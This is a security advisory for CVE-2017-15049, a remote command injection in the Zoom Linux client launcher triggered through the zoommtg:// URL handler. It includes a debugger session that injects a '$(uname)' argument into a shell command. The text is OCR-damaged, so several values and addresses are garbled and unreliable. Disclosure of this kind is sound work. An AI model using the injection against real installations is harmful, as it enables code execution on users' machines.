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[| CONVISO-17-003] - Zoom Linux Client Command Injection Vulnerability (RCE) 


1. Advisory Information 
Conviso Advisory ID: CONVISO-17-003 
CVE ID: CVE-2017-15049 
CVSS v2: 10, (AV:N/AC:L/Au:N/C:C/1:C/A:C) 
Date: 2017-10-01 


2. Affected Components 
Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb). Other versions may be 


vulnerable. 


3. Description 
The binary /opt/zoom/ZoomLauncher is vulnerable to command injection because it uses user input 
to construct a shell command without proper sanitization. 
The client registers a scheme handler (zoommtg://) and this makes possible to trigger the 


vulnerability remotely. 


4. Details 
gef> r 'S(uname) ' 
Starting program: /opt/zoom/ZoomLauncher 'S(uname)' 
ZoomLauncher started. 
cmd line: $(uname) 
SHOME = /home/user 


Breakpoint 5, 0x0000000000401e1f in startZoom(char*, char*) () 
gef> x/3i Spc 


=> 0x401eif <_Z9startZoomPcS +744>: call 0x4010f0 <strcat@plt> 
0x401e24 <_Z9startZoomPcS +749>: lea rax,[ rbp-0x1420 | 
0x401e2b <_ Z9startZoomPcS +756>: Mov rox, Oxf fF FFFFFFFFFFFFFF 


gef> x/s $rdi 

Ox7fFTFTFFFDF10: “export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export 
LD_LIBRARY_PATH=/opt/zoom; /opt/zoom/zoom \"" 

gef> x/s $rsi 

Ox7ffFFFFFA75O: "SCuname) " 


gef> c 


Cantinitina 


